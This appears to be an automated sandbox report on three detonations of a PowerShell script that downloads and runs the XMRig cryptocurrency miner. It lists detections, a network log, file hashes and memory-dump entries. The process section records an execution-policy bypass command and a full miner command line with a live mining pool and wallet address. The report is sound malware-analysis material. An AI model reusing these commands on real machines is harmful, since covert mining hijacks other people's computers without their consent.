memory/3808-113-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-114-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-115-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

memory/3808-116-0x00007FF7BFD90000-0x00007FF7C09C3000-memory.dmp

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:02

Platform

win10-20240404-en

Max time kernel

1794s

Max time network

1754s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rows, all fields N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

memory/3508-4-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-5-0x00000176F4B20000-0x00000176F4B42000-memory.dmp

memory/3508-9-0x00000176F4BD0000-0x00000176F4C46000-memory.dmp

memory/3508-8-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-10-0x00007FF992770000-0x00007FF99315C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zwxumpzt.4q1.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3508-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-48-0x00000176F4D50000-0x00000176F4D62000-memory.dmp

memory/3508-61-0x00000176F4BB0000-0x00000176F4BBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4348-90-0x00000152C06A0000-0x00000152C06C0000-memory.dmp

memory/3508-92-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-93-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/4348-91-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-94-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-95-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-96-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-97-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-98-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-99-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-100-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-101-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-102-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-103-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-104-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-105-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-106-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-107-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-108-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-109-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-110-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-111-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-112-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-113-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-114-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-115-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-116-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-117-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-118-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-119-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-120-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-121-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-122-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-123-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-124-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-125-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-126-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-127-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-128-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-129-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-130-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-131-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-132-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-133-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-134-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-135-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-136-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-137-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-138-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-139-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-140-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-141-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-142-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-143-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-144-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-145-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-146-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-147-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-148-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-149-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-150-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-151-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-152-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-153-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-154-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

memory/4348-155-0x00007FF7F3EC0000-0x00007FF7F4AF3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:11

Platform

win11-20240508-en

Max time kernel

1798s

Max time network

1786s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rows, all fields N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1212-0-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rb1tnmk3.eb1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1212-9-0x000002041BF70000-0x000002041BF92000-memory.dmp

memory/1212-10-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1212-11-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1212-12-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1212-15-0x000002041C460000-0x000002041C46A000-memory.dmp

memory/1212-14-0x000002041C480000-0x000002041C492000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3824-46-0x000001D18DC30000-0x000001D18DC50000-memory.dmp

memory/3824-47-0x000001D18DE80000-0x000001D18DEA0000-memory.dmp

memory/3824-48-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/1212-50-0x00007FFF4A593000-0x00007FFF4A595000-memory.dmp

memory/3824-49-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-53-0x000001D18DEC0000-0x000001D18DEE0000-memory.dmp

memory/3824-52-0x000001D18DEA0000-0x000001D18DEC0000-memory.dmp

memory/1212-51-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/1212-54-0x00007FFF4A590000-0x00007FFF4B052000-memory.dmp

memory/3824-55-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-56-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-57-0x000001D18DEA0000-0x000001D18DEC0000-memory.dmp

memory/3824-58-0x000001D18DEC0000-0x000001D18DEE0000-memory.dmp

memory/3824-59-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-60-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-61-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-62-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-63-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-64-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-65-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-66-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-67-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-68-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-69-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-70-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-71-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-72-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-73-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-74-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-75-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-76-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-77-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-78-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-79-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-80-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-81-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-82-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-83-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-84-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-85-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-86-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-87-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-88-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-89-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-90-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-91-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-92-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-93-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-94-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-95-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-96-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-97-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-98-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-99-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-100-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-101-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-102-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-103-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-104-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-105-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-106-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-107-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-108-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-109-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-110-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-111-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-112-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-113-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-114-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-115-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-116-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

memory/3824-117-0x00007FF6D2460000-0x00007FF6D3093000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 02:08

Platform

win10v2004-20240426-en

Max time kernel

1791s

Max time network

1769s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 rows, all fields N/A)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp

Files

memory/5040-0-0x00007FF8598C3000-0x00007FF8598C5000-memory.dmp

memory/5040-1-0x000001AEE3BC0000-0x000001AEE3BE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kai0klk0.twi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5040-11-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp

memory/5040-12-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp

memory/5040-14-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp

memory/5040-15-0x000001AEE3CD0000-0x000001AEE3CE2000-memory.dmp

memory/5040-16-0x000001AEE3BF0000-0x000001AEE3BFA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1668-47-0x000002416CDF0000-0x000002416CE10000-memory.dmp

memory/1668-48-0x000002416D150000-0x000002416D170000-memory.dmp

memory/1668-49-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-50-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-52-0x000002416E950000-0x000002416E970000-memory.dmp

memory/1668-51-0x000002416E930000-0x000002416E950000-memory.dmp

memory/5040-53-0x00007FF8598C3000-0x00007FF8598C5000-memory.dmp

memory/5040-54-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp

memory/1668-55-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/5040-56-0x00007FF8598C0000-0x00007FF85A381000-memory.dmp

memory/1668-57-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-59-0x000002416E950000-0x000002416E970000-memory.dmp

memory/1668-58-0x000002416E930000-0x000002416E950000-memory.dmp

memory/1668-60-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-61-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-62-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-63-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-64-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-65-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-66-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-67-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-68-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-69-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-70-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-71-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-72-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-73-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-74-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-75-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-76-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-77-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-78-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-79-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-80-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-81-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-82-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-83-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-84-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-85-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-86-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-87-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-88-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-89-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-90-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-91-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-92-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-93-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-94-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-95-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-96-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-97-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-98-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-99-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-100-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-101-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-102-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-103-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-104-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-105-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-106-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-107-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-108-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-109-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-110-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-111-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-112-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

memory/1668-113-0x00007FF76D640000-0x00007FF76E273000-memory.dmp

